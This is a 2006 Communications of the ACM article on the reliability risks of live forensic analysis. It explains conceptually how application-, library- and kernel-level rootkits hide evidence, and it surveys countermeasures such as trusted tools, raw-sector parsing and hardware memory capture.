Architecture and Hardware Next-generation cyber forensics

Risks of Live Digital Forensic Analysis

Live analysis tools have made a significant difference in capturing evidence during forensic investigations. Such tools, however, are far from infallible.

By Brian D. Carrier

Posted Feb 1 2006

Introduction
The Physical World
The Digital World
Sources of False Data
Countermeasures
Future Directions
Conclusion
References
Author
Footnotes
Figures

Your network intrusion detection system (NIDS) generates an alert that an attack has been launched against an internal server. You deploy the incident response team and they are faced with a dilemma. Do they turn the system off and analyze it or do they analyze it while it is still running? The server is used by hundreds of users and therefore powering it off would cause a loss in productivity, yet the reliability of data from a live, compromised system is questionable.

This is a common challenge in many environments and there is a trade-off between the availability of a system and the reliability of the investigation conclusions. This trade-off has existed since computer investigations were first conducted, but the techniques that attackers use to hide themselves are becoming more advanced, there are more attack alerts being generated, and commercial tools now exist to analyze live systems.

This article examines the area of live analysis and the methods that attackers use to hide evidence from investigators. The countermeasures that live analysis tools use are then examined along with their shortcomings and future directions.

The only difference between live and dead analysis is the reliability of the results. The same types of data can be analyzed using dead and live analysis techniques, but the live analysis techniques rely on applications that could have been modified to produce false data.

The Physical World

When considering new issues in digital investigations, I find it useful to consider a similar issue in physical world investigations. Therefore, I present this analogy:

A murder has occurred in a large hotel and the police are called. The only responder is a detective and he talks to the manager, who informs him the murder occurred in room 716 and the guests must not be disturbed. Therefore, the detective cannot restrict access to any parts of the hotel. Further, the manager refuses to give the detective direct access to any hotel rooms. Therefore, when the detective is interested in a specific room, he must locate a staff member and direct him or her to, for example, look for a specific object, describe the room, or take a digital picture.¹

The detective goes to room 716, locates a hotel staff member, and asks him to go into the room and take some pictures. The staff member comes out a couple of minutes later. The detective views the digital pictures and concludes the victim was shot, but does not see a gun. He directs the staff member to go back inside and look under the furniture for it. The staff member goes back in, comes out a few minutes later, and reports that he could not find the gun.

To many, this process seems absurd. The crime scene is not secured and the identity of the staff member is unknown and he could be involved with the incident. Maybe there are more bodies in the room or maybe the gun was in the room, but the staff member kept it out of the initial pictures and hid it in his pocket. It would be difficult for the detective to conclude the murder weapon could not be found. I propose this scenario is similar to the live analysis of a computer.

The Digital World

A digital investigation is a process to answer questions about the current or previous states of digital data and about previous digital events. It could be initiated because, for example, a corporate user violated a usage policy or an attacker compromised a system.

Digital investigations can involve dead and/or live analysis techniques. Live analysis techniques use software that existed on the system during the timeframe being investigated. This is in comparison to dead analysis techniques, which use no software that existed on the system during that timeframe.

In the opening example about whether or not to turn off a system, a live analysis would occur if the system were kept running and the response team members used the OS and other local applications to view log files and account information. A dead analysis would occur if the system was powered off, an image copy of the hard disk was made, and the image was analyzed in a lab using a trusted OS and applications.

It should be noted that this definition of dead analysis is quite strict because many hardware devices contain software. Therefore, when a hard disk is removed from a suspect system and plugged into an independent analysis system to make an image copy, we are performing live analysis because the hard disk contains software that existed during the incident. However, it is out of the scope of this article to discuss the different levels of live and dead analyses.

While the idea of live analysis is most commonly associated with incident response, it actually occurs every day on most computers when anti-virus software scans a file system looking for a virus infection. The anti-virus software, associated signature database, and OS existed during the potential virus infection and are being used to search out the virus.

Live analysis frequently occurs because it is too expensive to power the system off and boot into a trusted environment each time data needs to be analyzed. For example, the incident response team will likely want to confirm an NIDS alert using live analysis techniques because many of the alerts are false positives and therefore the critical server could be offline for several hours for nothing. In other cases, live analysis is used because the investigator does not want the user being investigated to suspect an investigation is under way.

The only difference between live and dead analysis is the reliability of the results. The same types of data can be analyzed using dead and live analysis techniques, but the live analysis techniques rely on applications that could have been modified to produce false data.

Sources of False Data

The most common source of false data during live analysis is from rootkits, described as “Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine” [9]. A rootkit hides the attacker by inserting a filter in the data flow of a computer. For example, when the investigator wants to look at the files in a directory, she uses an application to request the list from the OS. The list is passed through several pieces of software before it is displayed and at any time a filter could exist that removes the name of a file that contains evidence. Figure 1 illustrates how an attacker tries to hide a file named “passwords.txt.” The filter in the system looks for this file name, and others, and removes it from the output list. The file exists on the system, but the investigator never sees it.

There are various locations where attackers have installed filters. Consider the typical data flow path of most computers, as shown in Figure 2. The user interfaces with an application, which may use dynamic libraries installed on the system. The library or application uses system calls to interface with the kernel, which in turn has direct access to kernel memory and storage locations, such as hard disks and networks. These are the locations that contain evidence that an investigator wants to see.

Rootkits have been developed for each of the major interfaces. The most primitive rootkits were application-level rootkits, or user-mode rootkits, that replaced system executables with Trojan versions that would not display file names, process names, open ports, or system configuration values. One of the problems with this approach was that multiple applications can be used to obtain the same data and therefore all of the applications must be replaced. For example, to hide file names on a Unix system, the ls command must be replaced as well as the shell, find, and du. The bottom of Figure 2 shows an example where the passwords.txt name is passed through each layer until the application filters it out.

A different approach went one layer up and modified the libraries. A common filtering technique is to replace a library with a wrapper, which contains the same API functions as the original library. When the modified library function is called, it calls the original library, which calls the necessary system calls and processes the data. The modified library filters the data returned by the original library before the data is returned to the application.

The next step was to place the rootkit in the kernel and there have been several approaches to doing this [6, 9]. One approach was to use loadable kernel modules or device drivers, which many OSs support, so that the kernel does not need to be recompiled when new hardware or software is used. Like the library rootkits, these typically work like wrappers where the loadable kernel modules and device drivers wrap around the original system calls. The rootkit code calls the system calls and then filters the return data.

Another approach to installing the wrappers around the system calls is to directly modify the system call table in kernel memory while it is running. Alternatively, an attacker can modify the disk version of the kernel image so that the Trojan version is used the next time the system is booted. In all cases, the actual evidence exists in the system, but at some point in the kernel the data is filtered to remove specific entries.

Countermeasures

There are several countermeasures that exist to deal with rootkits. To counter application-level rootkits, an investigator can use a CD of trusted tools that he or she knows have not been modified. To counter library-level rootkits, an investigator can make sure the trusted tools on the CD are statically compiled so they do not use the Trojan libraries. However, on some systems it is not possible to make executables fully static and some libraries are required.

Countering the kernel-level rootkits is a more difficult problem because applications cannot access kernel memory or storage devices without the help of the kernel. There is a countermeasure that has, thus far, not been vulnerable to known rootkits. Typically, applications obtain specific types of data using specific system calls. For example, in Linux, the files in a directory are obtained using the getdents() system call, which uses file system- specific code to locate the sectors where the directory contents are stored and process the directory data structures. The system call then returns a list of files in organized data structures. The typical rootkit will modify the list of data structures after the file system code has processed the raw data. An example is shown in the top of Figure 3, which shows the communication sequence for an application requesting the contents of directory /tmp/. The kernel determines it needs to read sector 500 where the root directory contents are stored. The kernel processes the contents of sector 500 to find the entry for the tmp directory and then determines that the contents of the directory are in sector 812. The kernel reads the sector, processes the contents, and returns the list of files to the application.

The countermeasure is for the analysis application to rely less on the kernel and system calls. Instead of using the file system code in the kernel to determine where a directory is located and what files lie within, the application uses its own file system code. In fact, the application uses system calls only to read raw sectors, as illustrated in the bottom of Figure 3. It determines that it needs to read the root directory from sector 500 and uses the read system call to obtain its contents. The kernel reads the sector and returns the content. The application processes the contents and requests additional read operations until the directory contents are known. Several live analysis tools use this type of analysis technique when they process file system data [2, 5, 10]; it is similar to the approach used by the cross-view rootkit detection tools [4, 12].

This analysis approach makes it more difficult to introduce false data because a kernel-based rootkit must edit the sector contents in kernel memory. Therefore, it must wrap itself around the read system call and identify the sectors by either keeping track of which sectors contain sensitive data or by scanning each sector for keywords. Either way, this is more overhead than the previous rootkits.

When the kernel rootkit finds the data it wants to hide, it must next determine how to remove the data from the sector, which will be a file system-specific operation because various data structures will need to be changed so that the analysis tool does not detect inconsistent data. For example, if an NTFS file is being hidden, then the file’s name entry in a B-tree index must be removed and the index resorted (which may use sectors that the kernel has not yet read) [1]. If an Ext3 file is hidden, then the file’s name entry in a linked list of file names must be either removed from the list or marked as unallocated. The specialized analysis tools will show unallocated file names and therefore the unallocated name may need to be changed to something more generic and the inode address value should be cleared. Note that we have now created an inconsistent file system though because if fsck or scandisk were run on the file system then the rootkit may also prevent these tools from seeing the hidden file names. Therefore, the consistency checking tools will not find an allocated name for the allocated Ext3 inodes or NTFS Master File Table (MFT) entries where the hidden data is stored and will therefore delete the hidden file content or assign a new name to the content, which may not be hidden by the rootkit.

It is not impossible to hide a file completely, but the work becomes much more significant with this countermeasure because the rootkit must examine all data the system reads and it must have support for various file system types. This will increase their size and performance impact.

Future Directions

Because the architecture of production OSs prevents applications from accessing kernel memory and storage devices without using the kernel, kernel-based rootkits will always be a threat to live analysis. Future directions in live analysis techniques involve the use of specialized hardware to collect the raw memory and storage data for a dead analysis. For example, the Tribble system [3] is a PCI card that can make a copy of physical memory using DMA requests and does not rely on the kernel. Therefore, even if the kernel has been modified to hide open network ports or running processes, the network and process data will still exist in the memory image, which can be analyzed on a trusted system. Another related example is the Copilot system—a hardware-based rootkit detection system [8].

A more long-term approach is the change of system design such that software components can be better isolated. This would allow some components to be trusted in case of an incident and be used to analyze the compromised components. For example, if the system being investigated is running as a virtual machine, then the host system can accurately copy memory and the hard disk (if we can show that it too has not been compromised). Such a design may also allow other components to continue running as normal during an investigation, similar to how access to part, but not all, of a large building may be restricted during an investigation.

Conclusion

Live analysis may not produce reliable results, but it is useful in some cases. If we return to the hotel analogy, we may not find it acceptable for the detective to have restricted access because it is about a murder and therefore an important investigation. If the investigation was about a guest who lost his hat and was searching for it, then we may find it acceptable that the detective is not given access to everyone’s room and is not able to isolate various parts of the hotel where the guest thought he left it.

Digital investigations are similar where some incidents will be too important to risk using live analysis techniques, such as incidents that involve sensitive data or that may result in legal action. To date, there is more legal precedence with entering digital evidence from dead analysis than live analysis. On the other hand, if, for example, we have many computers involved in an incident and need to quickly identify their status then live analysis can save time.

As Thompson made clear with his work on compilers: “You can’t trust code that you did not totally create yourself” [11]. Obviously, this is still true today, especially when dealing with code that was created by someone with malicious intent.

Figures

Figure 1. Rootkits filter various types of data in different locations in the data path and remove data that could be evidence.

Figure 2. An example of a typical data flow in a computer system. The bottom shows an application-level rootkit.

Figure 3. An application can avoid some kernel rootkits by not using the standard system calls and instead using only the basic read calls and processing the raw data.

Submit an Article to CACM

CACM welcomes unsolicited submissions on topics of relevance and value to the computing community.

You Just Read

Risks of Live Digital Forensic Analysis

View in the ACM Digital Library

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee.

DOI

10.1145/1113034.1113069

February 2006 Issue

Published: February 1, 2006

Vol. 49 No. 2

Pages: 56-61

Table of Contents

Join the Discussion (0)

Become a Member or Sign In to Post a Comment

The Latest from CACM

Explore More

News Apr 18 2024

Keeping AI Out of Elections

Bennie Mols

Artificial Intelligence and Machine Learning

BLOG@CACM Apr 17 2024

Technical Marvels

Herbert Bruderer

Computer History

BLOG@CACM Apr 16 2024

The Value of Data in Embodied Artificial Intelligence

Shaoshan Liu

Artificial Intelligence and Machine Learning

Shape the Future of Computing

ACM encourages its members to take a direct hand in shaping the future of the association. There are more ways than ever to get involved.

Get Involved

Communications of the ACM (CACM) is now a fully Open Access publication.

By opening CACM to the world, we hope to increase engagement among the broader computer science community and encourage non-members to discover the rich resources ACM has to offer.

Learn More

The Physical World

The Digital World

Sources of False Data

Countermeasures

Future Directions

Conclusion

Figures

Risks of Live Digital Forensic Analysis

DOI

February 2006 Issue

Related Reading

Join the Discussion (0)

Become a Member or Sign In to Post a Comment

Shape the Future of Computing

Communications of the ACM (CACM) is now a fully Open Access publication.